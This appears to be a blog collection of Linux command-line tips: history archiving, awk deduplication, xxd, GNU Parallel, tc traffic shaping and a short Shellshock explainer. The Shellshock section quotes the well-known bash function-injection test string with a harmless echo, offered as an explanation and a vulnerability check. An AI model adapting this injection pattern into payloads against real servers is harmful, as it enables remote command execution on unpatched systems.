Archiving command history in Linux

#!/bin/bash
 umask 077
 max_lines=10000
 linecount=$(wc -l < ~/.bash_history)
 if (($linecount > $max_lines)); then
         prune_lines=$(($linecount - $max_lines))
         head -$prune_lines ~/.bash_history >> ~/.bash_history.archive \
                && sed -e "1,${prune_lines}d"  ~/.bash_history > ~/.bash_history.tmp$$ \
                && mv ~/.bash_history.tmp$$ ~/.bash_history
 fi

via BashFAQ/088 – Greg’s Wiki.

I needed to manage shell command history in a formal fashion in order to turn repeated sequences into scripts without having to type them in again.  I also wanted a  record of packages installed and in what order.   The history of commands is contained in .bash_history file which is read once when a terminal opens.   Running set -o vi allows for history commands to be recalled using standard vi commands.  The above script can be run as a user level cron job to periodically prune the top so many commands and place them into an archive.

The bash statements below set history size and make it so a command will be written to the history file immediately and not simply when a terminal closes.   These should be placed in .bashrc or whatever file executes when a new terminal opens.

HISTFILESIZE=400000000
HISTSIZE=10000
PROMPT_COMMAND="history -a"
export HISTSIZE PROMPT_COMMAND

shopt -s histappend

Remove duplicates without sorting file

Usually whenever we have to remove duplicate entries from a file, we do a sort of the entries and then eliminate the duplicates using “uniq” command.

But if we have to remove the duplicates and preserve the same order of occurrence of the entries, here is the way:

via UNIX Command Line: Remove duplicates without sorting file – BASH.

$ awk ‘ !x[$0]++’ file3

From: Unix: removing duplicate lines without sorting

This command is simply telling awk which lines to print. The variable $0 holds the entire contents of a line and square brackets are array access. So, for each line of the file, the node of the array named x is incremented and the line printed if the content of that node was not (!) previously set.

Linux Command: xxd


[rmiller@pacific]# echo "hello world" > hello
[rmiller@pacific]# xxd hello
0000000: 6865 6c6c 6f20 776f 726c 640a hello world

So you can use this tool to byte edit files. One rather unusual use I’ve found for it is to paste in an RPM to a system that I only had serial console access to. I just ran xxd on it, copied it into the buffer, and pasted it into a file on the remote server. A quick xxd -r, and voila. RPM.

via Linux Tips and Tricks.

I recently ran across the above blog entry which is from 2010.  All these years working with Unix systems and I never knew about this command.  When I parse a web site to extract information it’s necessary to output clean and concise ASCII data for my downstream scripts.  My perl scripts that html parse do filter this out but sometimes a funny character gets through.  Normally I have been using hexedit to determine the hex code of the offending character and although it works, it’s not as elegant as the above xxd command.  Now I can do the following:

xxd offendingdatafile.txt | grep "mystring" | more

The above should simply output lines containing the offending hexcode using grep if I kind of notice a unique searchable string (mystring) before the offending hex character.  I could also:

xxd offendingdatafile.txt > myfile.dat
vi myfile.dat

Instead of using clunky hexedit to search for mystring I can use good old vi.

I’m sure there are lots of other uses for this utility — especially in shell scripts.  Unix has so many commands and I utilize a subset adequate to getting whatever it is I need to do.  Every year I pick up one or two new useful commands that are more efficient and xxd is one of them.

Shellshock: How does it actually work?

env x='() { :;}; echo OOPS' bash -c :
The “env” command runs a command with a given variable set. In this case, we’re setting “x” to something that looks like a function. The function is just a single “:”, which is actually a simple command which is defined as doing nothing. But then, after the semi-colon which signals the end of the function definition, there’s an echo command. That’s not supposed to be there, but there’s nothing stopping us from doing it.

via Shellshock: How does it actually work? | Fedora Magazine.

But — oops! When that new shell starts up and reads the environment, it gets to the “x” variable, and since it looks like a function, it evaluates it. The function definition is harmlessly loaded — and then our malicious payload is triggered too. So, if you run the above on a vulnerable system, you’ll get “OOPS” printed back at you. Or, an attacker could do a lot worse than just print things.

I copied and pasted the above env command and it echos back OOPS.  This web server has been (I suspect) scanned already once with the scanner placing a ping command in the User Agent HTTP field.  Apparently User Agent gets passed to a shell environmental variable which will then get executed.  The only problem is that they need some kind of script to execute which there are none on this site.  This site simply returned 404, file not found to the scanner.

This could be problematic on sites with a lot of cgi scripts.  There is some exploit that can affect a client using dhcp to obtain an IP address from a malicious server.  I’ll find an explanation of that and put that up in its own post.   This story is evolving and even has its own brand name now — shellshock.

Console Internet Applications

Console based applications are light on system resources very useful on low specified machines, can be faster and more efficient than their graphical counterparts, they do not stop working when X Windows is restarted, and are great for scripting purposes. When designed well, console applications offer a surprisingly powerful way of using a computer effectively. The applications are leaner, faster, easier to maintain, and remove the need to have installed a whole gamut of libraries.

via Pick of the Bunch: Console Internet Applications – Linux Links – The Linux Portal Site.

Speeding Up Grep Log Queries with GNU Parallel

Enter GNU Parallel, a shell tool designed for executing tasks in parallel using one or more computers. For my purposes I just ran in on a single system, but wanted to take advantage of multiple cores.

Having enough memory on my system, I loaded the entire massive file into memory and pipe it to GNU Parallel along with another file consisting of thousands of different strings I want to search for in the “PATTERNFILE”:

cat BIGFILE | parallel –pipe grep -f PATTERNFILE

via Speeding Up Grep Log Queries with GNU Parallel – The State of Security.

tc: Linux HTTP Outgoing Traffic Shaping (Port 80 Traffic Shaping)

I‘ve 10Mbps server port dedicated to our small business server. The server also act as a backup DNS server and I’d like to slow down outbound traffic on port 80. How do I limit bandwidth allocation to http service 5Mbps (burst to 8Mbps) at peak times so that DNS and other service will not go down due to heavy activity under Linux operating systems?

You need use the tc command which can slow down traffic for given port and services on servers and it is called traffic shaping:

via tc: Linux HTTP Outgoing Traffic Shaping (Port 80 Traffic Shaping).